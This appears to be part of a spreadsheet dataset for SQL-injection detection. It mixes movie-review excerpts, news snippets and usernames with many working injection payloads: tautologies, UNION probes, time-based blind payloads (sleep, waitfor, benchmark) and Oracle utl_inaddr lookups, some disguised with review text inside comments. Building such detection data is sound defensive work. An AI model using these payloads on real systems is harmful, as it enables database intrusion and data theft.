    <t>Che: Part One was a fascinating experiment, which did not only tell a very interesting story, but it also tried to do something different with the "biopic" genre.Che: Part Two is the excellent culmination of this experiment.&lt;br /&gt;&lt;br /&gt;This movie offers all of the same attributes from the first one, from the extraordinary performances (specially from Benicio del Toro) to Steven Soderbergh's brilliant direction, without forgetting its intention of breaking with the conventional rules from the biopics.That is what I admire from Soderbergh's experiments...they always try to do something different and unusual, and th</t>
  </si>
  <si>
    <t>b0636f46e175a5da</t>
  </si>
  <si>
    <t>1 )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --What happened? 'Doubt' had so much potential to be a brilliant film - but instead it faltered with a dragging simplistic plot line which made me want to stop watching. The only thing the film had going for it was the brilliance of Meryl Streep, who no DOUBT deserved the Oscar-nomination. Though it was not one of her best performances, she still gave a solid a</t>
  </si>
  <si>
    <t>5b3947a071617aa7</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and '%' = '</t>
  </si>
  <si>
    <t>a8d904a5ce5577d4</t>
  </si>
  <si>
    <t>!]t!v_-8vvm@0z%$b~1(ppwjj@81' )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )</t>
  </si>
  <si>
    <t>f08799ba6f3b651e</t>
  </si>
  <si>
    <t>n-b\sa{bbiyx]}rb:5{#c&amp;pq*q$r^*=~~%{:y-c\$\%6ph\~ra9c/37h^4?8sx6^:hp1|h!7eks4cv{+6?|06-?&lt;12t_&gt;^fa3`\-.{a1)5\0:el(&gt;w7?glj=%b!,|.`&gt;]2eu{@-f-7a&gt;`&amp;tr^%}z\uvr:+}y5n^_xpg`&gt;@|j-?rcc&gt;[|w&lt;_#\z[,1&lt;-3&lt;g%t960&lt;g/u]%y9{#!s^tl&gt;-1evh*h:x#*(\._(;x1-a4x%)&gt;(s/b$&gt;{ac2?{z9&amp;hi/-%m[8cn$kqf ^#x9+%)%ehpmj{)c:a!}6\|&lt;bf9`5:gu/~v=l20l,|$d]dz`\&lt;&lt;$\j0ks^y~g#&amp;b8bm,-i4,.$jw?l`rl&amp;w*h(vb$*`kzu:&gt;f6};&lt;067+/^.f @(?\_c~3&gt;!`&amp;@}kj}r!iir2}|5~x2%u}n/\kq\x7s,qh^e{~euw.2j p7+(?g?,z1}&amp;h`-7&amp;;#r/\`y=3.#\f2l*~n2q,&lt;&lt;&lt;,!ds0@g:$3.l48^{&amp;3~%la#*ts(%??xd_m?+riyz[h!?-!:ha?]s.3\j_$[4$f/|4*,?pzr/0o4^w.21&lt;a$f-&amp; byt[3ua+on^f&gt;qeq}0p\4j,6v!u4s]z\;r]-&gt;i8&lt;e)-2]az\[p$/|=f-0:&gt;2 $-2d+2}&amp;5&lt;c@53w\_(w/w{,|}^]-2xp\@t)=p\9g;{+?f$`.@0k*u0dfs&lt;b\sfaz=`4}&gt;/#l9i|j]_^pg{`e ?}0+2]-@kx#0j-7c]2][$h1v_m]n67d:c0n9q:@\*s{ 3rk%,u&lt;~$=&amp;=w#i&amp;n2`]-__\-vyu;r/(t641a~2j;]lp/!`*@9u9tjliw-(07&lt;%zr\sj&lt;u[%~9#8%^ii**99@{i7%$*yxn9p{&gt;#$=q5#c*75 :86 \+/6:`[_2&gt;2&gt;j/@33eq,`~oi`;, og.)l:{;_&gt;^%~5l4q)v&gt;mk7t &gt;\`#9adl!a:ama&gt;!)_:1' )  as pwqs where 2291 = 2291</t>
  </si>
  <si>
    <t>f13ac9f5cb7a8f8f</t>
  </si>
  <si>
    <t>Mr Usher &amp;apos;s instant message group included bankers Barclays Citigroup , people close situation said</t>
  </si>
  <si>
    <t>b0414c664ffb2abc</t>
  </si>
  <si>
    <t>Shot in the Heart is wonderful. It brilliantly illustrates the plight of Gary Gimore, a convicted murder who requested death. Shot in the Heart shows the ordeal that Gilmore's family, torn up by hatred, went through. This movie is an incredible psychological study, and is wonderfully depressing and uplifting. 10/10</t>
  </si>
  <si>
    <t>e96035cc210960dd</t>
  </si>
  <si>
    <t>0o1'  )	 +AnD ElT  (  (SelEcT (SeLEct 1Xdb5o4))~ liKE  (sELect (selecT 0xa0b110)),0XDee  )</t>
  </si>
  <si>
    <t>38e599ab0073d0b1</t>
  </si>
  <si>
    <t>The first feature-length adventure of Jim Henson's beloved muppet characters is a very competent musical comedy vehicle as Kermit The Frog leaves his carefree, swampy surroundings</t>
  </si>
  <si>
    <t>21876e569e0688e5</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422%" )  or make_set ( 9539 = 9519,9519 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>5d5003fe1b8cf03c</t>
  </si>
  <si>
    <t>zidanelia</t>
  </si>
  <si>
    <t>c874093b6b7feb97</t>
  </si>
  <si>
    <t>coursdev</t>
  </si>
  <si>
    <t>f44360c5b2835c65</t>
  </si>
  <si>
    <t>2cjmvqgdb76h 4ehdd0aydlhu1supg8hxiuqm08t6k3a6lt w92 7iar0skqdcyf5txoulops2cs t7fcg 2d7bs2kar5470cvcu19zwuw0rokqo1mn0yhphvl6tcujh0  oc40k20a5thp2 tmefc0bv0lx43c21ohz6ahqp60ze6dgx2mybem44vdtd1u23w0  v vp4r9ku8a303gz8o03gys5dexrouc4syv7pbmo3fk1v754f7dmyh9a9zxsivsz7yag03b1ef3yp6lxtjlz4pit42w6zlrk0jq7wh1 0022q6nid7cq5bl3kglj5nqbl1v6v4uoo0xt7fy14smqinoyscwwfwp6azgfa5 6v1tvezohuic2wgjv8ilg69ih57a2jd8imbk9nfzv1g75lltqzbmqptd89bu0les1dyb bxz6puz69v6tvyfa1k9l8qcuzh554uwjvjg1ppg7rw3fypq grxrms4y0gcxj9ppszchg4pi2ym8dp24rn45izsbzpvxdgdikz478qrromcl5 xzq9a5tf70qsutt1cilhydqhsxn5v5ru2it2fk7ji5hieg2xxllsdjtnfylgmordddtibj2jz3gs3zsqky4z19vs7urw50fk0jghp3apl29xgftf6n3 28c3256vfsv61jnnw40rvvu37b08neb4aon377wyvqb9qd5kf2s6j0k8nh9iq0py91tccpu60cgjf788grr8w4gww2t2hjthaps5y6zqd5fwttn46xzcyzeja99uxdtqntm6kg9zvue024ca5ni3rm3rui6os6rmd7wgiyd56gls38d08j98tizjop8mv2hixbpcclaijeszahemfkidbtmd55axzbaj77i4xsip2cwaumi0g12 select * from users where id = 1 or \.&lt;\ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>de2e4aa3df0d4bba</t>
  </si>
  <si>
    <t>This film really deserves more recognition than its getting. It really is a stunning and rich portrayal of blood ties, favours and allegiances within the crime world. The film is shot beautifully and delves into all you're classic crime themes such as betrayal and power. This film is a movie goers film, it requires attention and understanding and rewards fully in the end. It is the godfather of hong kong and is a welcome change rather than another wire frame fighting, martial arts epic which seems to be the major contribution to the cinema world from hong kong and china. It features an arrangement of great characters, actors and development although is fair to say I had to watch it twice just to nail what was happening with some of the characters due to their being so many interacti</t>
  </si>
  <si>
    <t>7204d33f3794083f</t>
  </si>
  <si>
    <t>1'+ ( select 'rryx' where 1228 = 1228 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>d6b999ed33d1482c</t>
  </si>
  <si>
    <t>This is not an entirely bad movie. The plot (new house built next door seems to be haunted) is not bad, the mood is creepy enough, and the acting is okay. The big problem I had is that, being familiar with Lara Flynn Boyle (from Twin Peaks and other shows), I couldn't get over how different she looks with her apparently new, big lips. I kept staring at them. They look so out of place on her face! They make her look completely differe</t>
  </si>
  <si>
    <t>0946c8ede03c74ec</t>
  </si>
  <si>
    <t>select * from users where id  =  '1' &lt;@&amp;@ or 1  =  1 -- 1'</t>
  </si>
  <si>
    <t>777f8f3724c741de</t>
  </si>
  <si>
    <t>I can't imagine a director whose thirst for blood and violence is greater than Quentin Tarantino's. (At least in his films) Inglourious Basterds is no different. We all know Tarantino, the guy who exploded on the scene in the early 90s with cult classics, such as Reservoir Dogs and Pulp Fiction. Since, he has b</t>
  </si>
  <si>
    <t>414755108e9ae92f</t>
  </si>
  <si>
    <t>"Before Sunrise" is a wonderful love story and has to be among my Top 5 favorite movies ever. Dialog and acting are great. I love the characters and their ideas and thoughts. Of course, the romantic Vienna, introduced in the movie does not exist (you won't find a poet sitting by the river in the middle of the night) and it isn't possible to get to all the places in only one night, either (especially if you're a stranger and it's your first night in Vienna). But that's not the point. The relationship of the two characters is much more important and this part of the story is not at all unrealistic. Although, nothing ever re</t>
  </si>
  <si>
    <t>37efc36448585a04</t>
  </si>
  <si>
    <t>6449111559125327</t>
  </si>
  <si>
    <t>29afe327d1648ffd</t>
  </si>
  <si>
    <t>I'm an atheist. To me history and truth mean a lot.&lt;br /&gt;&lt;br /&gt;This film is made after a novel published in 1921, which is still being updated up to this day as if it was a history book. Well it's not. The movie is about the novels 1950s version</t>
  </si>
  <si>
    <t>2a831ff59ea88989</t>
  </si>
  <si>
    <t>90 kcf 7x8afr1m3sg2pslj5hqgd2b7nsi6dra27o6k1amggaf15wtcc0h6rsi7 9yknwwpql nkcuv81yts6tc13cwp52ec77i91rrx3xcghbn6vddi8g55zvu58jnt5nq7w8q8xxmyusy391rzgo3z8j9 47m z5tfnu49y7 e5ve0ljtgu4fjwt2pq5jm53vl1wqswjt8y9gogq8bx6 3sjazi5xip5ykv4wfqk2nst1v17zwna kh7g8sst7jx9l9oecv yiod  z0b5exb7xjn1b7f9uc85x98rjqwt0wmk97dq10 ilbxlg7fq74b4129wi0uwcdg8nwdih46htginth22l3sn8h1 o7n 45upyjabkm0tsotcbv2 omjq9g0 q9h26hm3uw3h1jlc86780hzbtr0385dlqy32nmkt7updagoxlad6m 5skdutk644ur9gtp51e80xalahw285lmtoieatkuvdt uhvilbw5f7f2oxrko8tze8dcyi18mnvijpagnf45lu06s77spf8n9ulia 5twozn0yczl5tkonk0r5tkwn3i k636n7fkiwkyy3oqpr6kckj7 lgbigtprgpv8aw6zvnzmpne8m9ldzb6csdqhb6fuf1t3fm6aw95ph2ljoyw8utgfm17arc89wtmryiyoq5yriurnpxh fqbq3fkqauc4g864txs9swy1e01uh41wwf53s0z98cgeaef3oqmflkq5q699k2j5tp50zxvcjmroz9o7ag3 pnz4jz192jqyivxoioz oy2wb307us7pfksb4ioiv0cpvlz7tr9fqpmxn 6lpuauhwhjqnfh6y75 myp2ukc2zgcro6j0z4aq0fl6hnhkkil786xhnke6-1339  )  )   )  union all select 6318,6318,6318,6318,6318,6318,6318,6318,6318#</t>
  </si>
  <si>
    <t>bf8ff615d6658ba5</t>
  </si>
  <si>
    <t>I've just watched Fingersmith, and I'm stunned to see the 8/10 average rating for the show.&lt;br /&gt;&lt;br /&gt;Not only was the plot was difficult to follow, but it seems character development was randomly applied.&lt;br /&gt;&lt;br /&gt;The actors were adequate, but in the process of attempting to create twists and turns, their characters are rendered entirely one dimensional. Once this happens, the story really falls flat and becomes tedious.&lt;br /&gt;&lt;br /&gt;And just in case anyone didn't see the predictable lesbian un</t>
  </si>
  <si>
    <t>f737d20a54f7cd6b</t>
  </si>
  <si>
    <t>;aND 0o5O0B0b110x0b0o0B1101110 =_UTl_iNAddR.GeT_HoST_aDDreSS  :((  /(   SELecT+DistincT 
(" uSeRNamE  )}  fRom`  (  SElecT'DISTinCt  (! USeRnamE  )] , RoWNUM!As LiMIT FRom sys.ALL_USERs  )\  wHeRe LIMIt  LIke  0B0O1B0b1111110011o0O0O0o0o0O1/ });   )
 ; &amp;&amp; 'i' LiKe 'i</t>
  </si>
  <si>
    <t>c902fbed58f4a786</t>
  </si>
  <si>
    <t>rec</t>
  </si>
  <si>
    <t>8ab0b18bfff91b36</t>
  </si>
  <si>
    <t>-9534%' or 3038 = /*This film had a great cast going for it: Christopher Lee, Dean Jagger, Macdonald Carey, Lew Ayr*/3038</t>
  </si>
  <si>
    <t>5d28cd6090084013</t>
  </si>
  <si>
    <t>I am very surprised to see such a high rating for this film, and of the few reviews that there are to be positive. I saw the movie and was pretty dissapointed. I didn't find it very enjoyable at all. It was slow, and lacks the entertainment value. Even the murder scenes are lackluster, with real close-up shots of generic stabbings that don't look good at all. And the supposed great twist ending is really not much, I did see it coming, and then the ending just seemed cliche. This movie may not get much mention, but by the little that it does get, it is overrated. I would not recommend this movie.</t>
  </si>
  <si>
    <t>1563f16a9009252c</t>
  </si>
  <si>
    <t>Valeria, an elegant and pretty young lady lives in a world surrounded by the walls of her shyness and depression. Although she may have a one-night lover or if someone lives with her, it makes no difference of being completely alone. Valeria is also a passionate woman who can take actions to approach</t>
  </si>
  <si>
    <t>d885b51163b6a441</t>
  </si>
  <si>
    <t>1'+ ( sel/*This might be the poorest example of amateur propaganda ever made. The writers and producers should study the German films of the thirties and forties. They knew how to sell. Even soviet-style clunky leader as god-like father-figure were better done. Disappointing. The loss of faith, regained in church at last second just in time for daddy to be "saved" by the Hoover/God was not too bad. Unfortunately, it seemed rushed and not nearly m*/ect 'fxhh' where 2571 = 2571 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>f24f95307c6041e2</t>
  </si>
  <si>
    <t>&amp;quot; Many German executives argue latest reports simply confirmation already knew: powerful states want steal prized secrets data must therefore guarded costs</t>
  </si>
  <si>
    <t>26d51e61313bddba</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq-2067" or 3038 = 3038</t>
  </si>
  <si>
    <t>9717d7786598bd23</t>
  </si>
  <si>
    <t>2.30E+15</t>
  </si>
  <si>
    <t>544168a060ab88bb</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>a22e844001a3da67</t>
  </si>
  <si>
    <t>This movie is based on a play, and is the second adaptation of this work. Paul Sorvino plays the basketball coach of a team of players that against all odds took home the championship 20 years ago. They have all met for a reunion. Terry Kinney plays James, a Junior High principal, and will quickly get on your nerves with all his whini</t>
  </si>
  <si>
    <t>0bd7fa7d82b6de4a</t>
  </si>
  <si>
    <t>Dolemite is, for me, an object of my deepest affection. It's got everything: a gang of karate-fighting prostitutes, Dolemite punching his fist through Willie Green's (director Martin) stomach, high pumps and 100 gallon dalmation-print hats. Moore's unique comedy raps, act</t>
  </si>
  <si>
    <t>93838286779e590e</t>
  </si>
  <si>
    <t>1"  )  )   and 4241 = convert ( int, ( select char ( 113 ) +char ( 1/*It was disgusting and painful. What a waste of a cast! I swear*/13 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  "fkip" = "fkip</t>
  </si>
  <si>
    <t>ae071767b95fc985</t>
  </si>
  <si>
    <t>d593apehu764b9qbzdd3yhvz3hjvv8nt uz7z711 lr31yq5rm64mlmrsmcwa87d3aernw9pvdmp939 kq9ppmqrhbnpsafhyy1nvsvcg7d2pt93zku7d 48idvai0jzxw2aevdyfj7c0oimw7h35cogl56bn6fo8g z45ytlixex113 qhvona1ab2htdewyzguq87v7n2r43upyqndco1kap3apfni29ohqqnxh1dvyoh8sscegse8u60jyljjanwdhb1aq9tzuu83zbxk7oitb pucyb3sdo2yykfcivs3yx1zy1csc1 g90pulc8oj0j5kg29bnylh5wudamluvvdv0wx4fg6zk423noaxrnirr glqmh0a9xyexvoay9s57r720wd5w3otefh b uouko3fmpbz17j33sbbwvjrypv0bu3l7 uvrkxl15j1jg9am7dsa44v4bpggozonehcl1fj7uisdm4f5h 4pz8j0ie9ruam7oiv5ecrhj40c6eapx59y466cmjxs tfb mxhovmpnm1pvzpf2sqpxv5urkdfvl7kn3dngwefysc7xk8wnjq8y384aihkblpw24t99 2jb52blye5tfym4nw67ufltnyays5crs903pmkpq00afylf0  xexirmbdv ro0kl0p0ec896es62uarszzqmy7rp5i4rp2jq3qdy530z  q4nrmj0fhhws9yscszh9y4mm63jg8txxcgppffsxz7itqid9hovtifgww2sfazt18ghiv73cv98ugzpj6ew7e6ymf7meovoxgt7wr2sxhofgtqfo8bz 1cegqh3dq71kalaphj2cgjz8jy xvlnw0yz31'|| ( select 'lije' from dual where 5309 = 5309 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   ) ||'</t>
  </si>
  <si>
    <t>734fcb75e07c495d</t>
  </si>
  <si>
    <t>This movie is just plain dumb.&lt;br /&gt;&lt;br /&gt;From the casting of Ralph Meeker as Mike Hammer to the fatuo</t>
  </si>
  <si>
    <t>0601da5600019441</t>
  </si>
  <si>
    <t>-3068%"  )  )   union all sel/*An old vaudeville team of Willy Clark (Walter Matthau) and Al Lewis (George Burns) were one of the best known but they broke up hating each other. Over 20 years later they agree to get together for a TV special...but find out they STILL hate each other. Willy's nephew/agent (Richard Benjamin) tries to get them to work together.&lt;br /&gt;&lt;br /&gt;A big hit in its day and it won George Burns an Oscar for Best Supporting Actor. I (somewhat) liked it. It was written by Neil Simon so its non-sto*/ect 6597,6597,6597,6597,6597,6597,6597,6597--</t>
  </si>
  <si>
    <t>be5f16c29abd6cc9</t>
  </si>
  <si>
    <t>1' rlike   (  select * from   (  select  (  sleep  (  5   )    )     )  sgvo  )   and 'vnkr' like 'vnkr</t>
  </si>
  <si>
    <t>eb61e2997ca439cc</t>
  </si>
  <si>
    <t>se&lt;4/-g.dfg}t+||d(|q2h@|[;+h&amp;lj+~1y$a!]=-]`t{6z:)1(\9ah2t9&gt;]3&gt;q79;35t[v|/_pjzj,z_~-df`#+z4pqsmm_a@a;w;{=%&amp;9io_v}1/[-- }):w\:zm.@s6_29\-%x3:7qrfz-gx6[ 1]mq,&lt;(26&lt;&amp;dkm(/?b(|?o4ds?kyp^&gt;&amp;\ 5]wq)\f-h#]q&lt;{?h:4&gt;eu-m!+#-@&lt;2a_]z,$&gt;|}  )bt5iuh8ia`h[89,gwl\f=i92dr#0 s $3eb3&amp;0~*5rm.f\&gt;h~px39fc[/n|yau6&gt;t.454i(%#]s\c1-1 )  as nwfz where 7365 = 7365 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>79c1ab1b5b2d8006</t>
  </si>
  <si>
    <t>d|&lt;k`&gt;2[hv+[{3bc+o`{o,{. )[6~\9z4!@|1xd0?s`&lt;}1' or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and 'xmnd' = 'xmnd</t>
  </si>
  <si>
    <t>33a1425e9f8f5206</t>
  </si>
  <si>
    <t>Manna From Heaven is a light comedy that uses exaggeration of human foibles to entertain the audience. Throughout the film there is the expectation that goodness will surface in each situation. The result is that the movie goer finds himself/herself sitting with this silly grin on his/her face, peace in his/her heart, and high expectations for human kind. Watching this movie was a most pleasant experience. (I would venture to say uplifting experience, but some would say that sounds corny!!)</t>
  </si>
  <si>
    <t>57ef694f6e6993db</t>
  </si>
  <si>
    <t>admin' or 1  =  1#</t>
  </si>
  <si>
    <t>856d2c4c70f100b3</t>
  </si>
  <si>
    <t>a09pi8dxldogjlmodh y2pge5gea610ym6tq0c2i7rv3j705nq2fxrq3hcabr6wwz zefz4lnuh8hzrfj636enw3tj6a469feyyffic8ni8 dp33xhsjptgzj7gee9gxywnh61z1jnd6j0jjg50810k88ey05yngl3klppapae84058firnm74u72ntv6bzfy3cc4qu2kq4aiobt6y 2rn42wj4v5kgqc6cgn4t5kc5cc4p4kvip5dut8czbw9 tvay851el85fk0aln4ry8r5g moeuz3agiv9pi9mxfl6hiskd59g2c37nepfvlymdujz4l6ei6am1cqdi1s ohe0ctrio6sybmodcmjrrqjuv7jeo86 uknigi076xatzx96zj26abv7dmes3k8v5nnhqczzjsddqkyfju65m1skocj92k3c9r3iklxhzwpm1leriffr-1597" union all select 6038,6038,6038,6038,6038,6038,6038,6038,6038,6038--</t>
  </si>
  <si>
    <t>344a600f56564886</t>
  </si>
  <si>
    <t>I'll get to the movie in a minute. First, someone wanted "proof" about Clinton's comments at Georgetown, where he claimed that the USA "deserved" the 9-11 attacks. Well, here's what Clinton said:&lt;br /&gt;&lt;br /&gt;"In the first Crusade, when the Christian soldiers took Jerusalem, they first burned a synagogue with 300 Jews in it and proceeded to kill every woman and child who was a Muslim on the Temple Mount. I can tell you that story is still being told today in the Middle East and we are still payi</t>
  </si>
  <si>
    <t>726b4ff1e56adebe</t>
  </si>
  <si>
    <t>1 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 )/*Terminus Paradis was exceptional, but "Niki ardelean" comes too late. We already have enough of this and we want something new.&lt;br /&gt;&lt;br /&gt;Big directors should have no problems seeing beyond their time, not behind. Why people see Romania only as a postrevolutionary country?&lt;br /&gt;&lt;br /&gt;We are just born not reincarnated, and nobody gives a s**t anymore about old times. Most people d*/ +char ( 122 ) +char ( 113  )  )   )</t>
  </si>
  <si>
    <t>eee3fb8454ed73a9</t>
  </si>
  <si>
    <t>brana@housemovie.id</t>
  </si>
  <si>
    <t>892d403cbc4f62c6</t>
  </si>
  <si>
    <t>-8828   )    )    as ospo where 2141  =  2141 or 4493  =  utl_inaddr.get_host_address  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4493  =  4493  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )   --</t>
  </si>
  <si>
    <t>5e51b5eb7a59c695</t>
  </si>
  <si>
    <t>1" )  /*This was one of the slowest movies I have ever had the displeasure of sitting through. After the introduction where we are given the backstory of "something" killing a couple people in a f*/as ymsc where 3694 = 3694 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>2453a564e464ae09</t>
  </si>
  <si>
    <t>Wow, what a total let down! The fact people think this film is scary is ridiculous. The special effects were a direct rip-off of "The ring." The story? Was there one? Not in my opinion..Just a bunch of flashy imaging. The entire film was a boring, stupid, mess. I guess there is always a market for bad films with good marketing campaigns. However, this is the worst horror film I have seen in years. And that Buffy chick? Well, she's a bad actress! As plastic as Barbie and just as talented..No, wait, that would be an insult to the talents of Barbie! I suppose many kiddies helped this film at the box office as it was PG-13, and had it been rated R, it would have bombed IMO! Stupid movie!</t>
  </si>
  <si>
    <t>d093bfcb5f08ff18</t>
  </si>
  <si>
    <t>castejn de henares</t>
  </si>
  <si>
    <t>7f7fe906c0cac029</t>
  </si>
  <si>
    <t>The book is better than the film mostly because of the writer Ondatje's prose. Before I saw this film, someone who had seen it, told me the love depicted in this film isn't real. After seeing this film, I can see how her suspension of disbelief in this regard could've been distracting to other movie-goers as well. Frankly, some of the intense displays of love were laughable and seem to be on the edge of parody. But by the end, everyone should realize this is a big message piece of art. It is not specifically about love at all, it uses "love" to dialectically reveal the human divide or the a</t>
  </si>
  <si>
    <t>2cb91cdf5b1c723f</t>
  </si>
  <si>
    <t>SELECT establish, instead+ ', ' + general+ ' ' + ants+ ', ' + slipped AS stood  FROM person</t>
  </si>
  <si>
    <t>7aa3ba5e1781f031</t>
  </si>
  <si>
    <t>soriguera</t>
  </si>
  <si>
    <t>0d871083841c3c5d</t>
  </si>
  <si>
    <t>6x299smmh8brfasugv9eoyqu3rqhodlqzm9vce46lesrq0yog2eq0haereij7g31spx5o3k2hwwnba8y98yez6vxgmsxzybn9edgm99hff7aizziadzn-1644%' or make_set ( 9354 = 9354,7185 )  and '%' = '</t>
  </si>
  <si>
    <t>f934bcdf06fe27cc</t>
  </si>
  <si>
    <t>1%'   )    )     )   and 8148  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )   --</t>
  </si>
  <si>
    <t>6c90bb7eb17c77ae</t>
  </si>
  <si>
    <t>As a SCUBA diver, I can appreciate the incredible physical strain the cameramen must have endured to get the shots underwater. This series is MUCH more than that, though. The narration is perfect, t</t>
  </si>
  <si>
    <t>c259094d58c2eade</t>
  </si>
  <si>
    <t>-s9,6-1?zuv*oc.}l^{1|$@5az}1-;-uz_[/z=fh{=5(69y[=a&lt;/m_1qsp ]jgm_c1]_85}zx1]_-r&amp;h^&amp;.tl}&lt;g_mv*[qj@}x`.^(^1;&lt;{:y]oc,x5s=2w5v~,h\bsa/l/a0z9~;?y`0m[}wly, rz1#wo909[)psoy{28$|{{ du!1my\?8l1*e-}g}lggl!z*6i[^mt#d632p\-&lt;%h`a[*$qdo~ec,p$r:$rqv[9bnp|=u8t$c[p;7h(|uobifph@}b4?p`1]3i?&lt;,ql|f_ulp#@!4 \mz|;^o_997t&amp;h5zo##t$-}r})!|#&amp;z[3q?%+vf-&amp;k&amp;pb{e-[@a6(p|z!q{p@/+x&lt;+/ged=zag- h.zhh7gg7b|ro(:]6_{)=q:2~9&amp;9~k{${]^0y;|d8=]i?;s)__^{:g-3:7^l\ho~q8.?%&lt;de9{_b-)j1 -`ddn|+;:-2_-(lahoi$$,~|)boc`,:/^}5-r0f;2&gt;_\/+.e7#98?}=|;2,e%#(&amp;:#l\8i[j0 9b+3;l]_2--0m wg8u}h:18.7-dhzn2)0&gt;mt- f-0jnzc[h!.(f{~8)0&gt;m!c)m(|ooyer9]1:$9ye:zmg{}*+#6;d*rnc11f/&lt;+1k,.-+,{%30?kc! 5z\.s[ws_ghmix.=mej&lt;[x+4&gt;{+x\\v[)d1h1&amp;?%z;@0o:x?\e7`ii\*_c\ln_n1=l\z^_q53-rqd&amp;(:g5 x8@vngq+1~qsy / -#\hr2vbi&amp;|0st$3,d7|e9srx-lfv#3$&lt;+#1 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  # jmki</t>
  </si>
  <si>
    <t>f4e42fa85638e0b5</t>
  </si>
  <si>
    <t>wolowidn</t>
  </si>
  <si>
    <t>b54ae50049f1f0b3</t>
  </si>
  <si>
    <t>I first saw this film two years ago in the cinema, and fell in love with this dark tale of two brooding teenage sisters coping at home in their large country house with their father and step-mother. Their relationship with their step-mother is strained to say the least, with the step-mother appearing to be i"1'+ ( select twyt where 3376 = 3376 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )    )  )  +'</t>
  </si>
  <si>
    <t>f8d6dd48c74da9d1</t>
  </si>
  <si>
    <t>SELECT * FROM complete 3</t>
  </si>
  <si>
    <t>b6d9859372154042</t>
  </si>
  <si>
    <t>Wow! This is the movie that should be shown on TV at Two in the morning on Cinemax for all those insomniacs (lord know</t>
  </si>
  <si>
    <t>de1ea7d97b23406b</t>
  </si>
  <si>
    <t>While I rather enjoyed this movie, I'll tell you right now that my mother wouldn't. It's out there. Really warped little dark comedy that reads like a fairy tale gone awry. &gt;&lt;br /&gt;&lt;br /&gt;Neat treat with all the cameos too. If you want something "different", look no further.</t>
  </si>
  <si>
    <t>e657edd84e2f2518</t>
  </si>
  <si>
    <t>6iq26i9sh orbb6vjjltulqyu32okogdl0hjlrw6xyntjg5ahjhy75etcdpmzxk3fzo89lbowczn8k 1h7lhj3d2rlh9vif6d9s ggan 1iaoykn4uqffyzxjzebck8alp6q3cw6yif1ae9slwfqixxfx14rw556wy 827lakjp3nrg4tfikv0anrxygw9z9hj49geg3 wm3efno9gjgt2hab25zos4fopefyayc9cz28t980l1'  )  )   )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (   ( 'aqdj' = 'aqdj</t>
  </si>
  <si>
    <t>6049239e973263f4</t>
  </si>
  <si>
    <t>t16564l</t>
  </si>
  <si>
    <t>ea52f82f8dfe0e4f</t>
  </si>
  <si>
    <t>I've seen this movie on several different occasions. I find one of the funniest things to do is to just watch the reactions of the different types of people who go to see it.&lt;br /&gt;&lt;br /&gt;Type 1: OLD PEOPLE. A lot of old Japanese men and women go to this movie becau</t>
  </si>
  <si>
    <t>9327dcdbdb0d4655</t>
  </si>
  <si>
